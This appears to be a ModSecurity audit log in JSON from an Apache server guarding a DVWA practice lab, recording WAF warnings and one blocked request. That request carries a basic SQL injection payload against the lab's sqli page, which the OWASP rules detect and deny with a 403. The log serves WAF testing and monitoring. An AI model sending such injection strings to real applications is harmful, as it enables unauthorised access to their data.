(http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:24:07 --0400","transaction_id":"WRdBN38AAQEAABwRiH8AAAAE","remote_address":"192.168.75.181","remote_port":47178,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/index.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/login.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"2725","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/index.php\"] [unique_id \"WRdBN38AAQEAABwRiH8AAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":658,"p2":2061,"p3":169,"p4":2695,"p5":89,"sr":23,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:24:11 --0400","transaction_id":"WRdBO38AAQEAABwRiIAAAAAE","remote_address":"192.168.75.181","remote_port":47178,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdBO38AAQEAABwRiIAAAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":580,"p2":2027,"p3":114,"p4":553,"p5":100,"sr":28,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:24:11 --0400","transaction_id":"WRdBO38AAQEAABwNvyUAAAAA","remote_address":"192.168.75.181","remote_port":47180,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/index.php","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdBO38AAQEAABwNvyUAAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":828,"p2":2535,"p3":118,"p4":957,"p5":140,"sr":34,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:24:13 --0400","transaction_id":"WRdBPX8AAQEAABwNvyYAAAAA","remote_address":"192.168.75.181","remote_port":47180,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1480","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdBPX8AAQEAABwNvyYAAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":597,"p2":2752,"p3":153,"p4":505,"p5":88,"sr":29,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:13:27:24 --0400","transaction_id":"WRdB-H8AAQEAABzhe10AAAAF","remote_address":"192.168.75.181","remote_port":47184,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=1%27+or+1%3D1+--+%27&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: 1' or 1=1 -- '\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: 1' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdB-H8AAQEAABzhe10AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: 1' or 1=1 -- '\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdB-H8AAQEAABzhe10AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: 1' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdB-H8AAQEAABzhe10AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdB-H8AAQEAABzhe10AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdB-H8AAQEAABzhe10AAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":1045,"p2":3564,"p3":0,"p4":0,"p5":184,"sr":30,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:21:54 --0400","transaction_id":"WRdOwn8AAQEAABwOGocAAAAB","remote_address":"127.0.0.1","remote_port":43634,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1","If-Modified-Since":"Sat, 13 May 2017 16:59:06 GMT","If-None-Match":"\"ccc-54f6abd648acd-gzip\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:59:06 GMT","ETag":"\"ccc-54f6abd648acd-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1213","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRdOwn8AAQEAABwOGocAAAAB\"]"],"stopwatch":{"p1":2171,"p2":2603,"p3":103,"p4":5089,"p5":63,"sr":30,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:21:54 --0400","transaction_id":"WRdOwn8AAQEAABwOGogAAAAB","remote_address":"127.0.0.1","remote_port":43634,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:59:08 GMT","If-None-Match":"W/\"295-54f6abd8205b9\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 18:21:50 GMT","ETag":"\"295-54f6be54cc0d8\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRdOwn8AAQEAABwOGogAAAAB\"]"],"stopwatch":{"p1":385,"p2":1140,"p3":63,"p4":202,"p5":57,"sr":17,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:21:54 --0400","transaction_id":"WRdOwn8AAQEAABwOGokAAAAB","remote_address":"127.0.0.1","remote_port":43634,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not 